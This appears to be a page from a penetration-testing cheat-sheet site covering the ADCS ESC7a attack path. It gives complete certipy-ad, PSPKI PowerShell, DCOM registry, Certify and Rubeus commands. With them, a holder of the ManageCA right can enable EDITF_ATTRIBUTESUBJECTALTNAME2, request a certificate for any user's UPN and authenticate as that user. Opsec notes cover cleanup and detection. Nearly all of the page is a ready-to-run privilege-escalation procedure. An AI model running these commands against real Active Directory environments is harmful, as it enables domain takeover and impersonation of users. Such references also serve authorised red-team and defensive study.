🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ADCSESC7a

ADCSESC7a

ESC7a: ManageCA right on Enterprise CA β€” use it to enable EDITF_ATTRIBUTESUBJECTALTNAME2, turning the CA into an ESC6 condition, then enroll with arbitrary SAN.

Applies to: Principals with ManageCA (CA Administrator) right β†’ Enterprise CA

Linux Abuse

certipy-ad

# Step 1: Confirm ManageCA right and enumerate CA
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Add self as CA officer (needed to issue/approve certs)
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -add-officer <username>

# Step 3: Enable EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -enable-flag EDITF_ATTRIBUTESUBJECTALTNAME2

# Step 4: Restart CA service to apply flag (may not always be required β€” test first)
# (Requires CA restart β€” may need admin on CA host)

# Step 5: Now exploit as ESC6b β€” request cert with arbitrary UPN
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>' \
  -upn <target-user>@<domain>

# Step 6: Authenticate
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Cleanup: disable flag
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -disable-flag EDITF_ATTRIBUTESUBJECTALTNAME2

Windows Abuse

PSPKI module

# Install PSPKI if not present
Install-Module -Name PSPKI -Force
Import-Module PSPKI

# Enable EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA
Get-CertificationAuthority -ComputerName <ca-host> | `
  Enable-PolicyModuleFlag -Flag EDITF_ATTRIBUTESUBJECTALTNAME2

# Verify flag is set
Get-CertificationAuthority -ComputerName <ca-host> | Get-PolicyModuleFlag
# Or via certutil:
# certutil.exe -config "<ca-host>\<ca>" -getreg "policy\EditFlags"

# Now exploit as ESC6 β€” request cert with arbitrary UPN
Certify.exe request /ca:<ca-host>\<ca> /template:<template> /upn:<target-user>@<domain>
Rubeus.exe asktgt /user:<target-user> /domain:<domain> /certificate:<pfx-base64> /ptt

certutil (alternative β€” direct registry via DCOM)

$configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "<ca-host>"
$configReader.SetRootNode($true)
# Read current EditFlags
$configReader.GetConfigEntry("EditFlags", "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
# Set EditFlags with EDITF_ATTRIBUTESUBJECTALTNAME2 (0x00014C02)
$configReader.SetConfigEntry(1376590, "EditFlags", "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")

Opsec

  • Enabling EDITF_ATTRIBUTESUBJECTALTNAME2 is a highly visible CA-level change β€” it shows up in CA audit logs and is trivially detected by any ADCS audit.
  • The flag change persists across reboots; disable it immediately after obtaining the cert.
  • CA admin actions are logged under the Security event log on the CA server (Event ID 4870, 4882).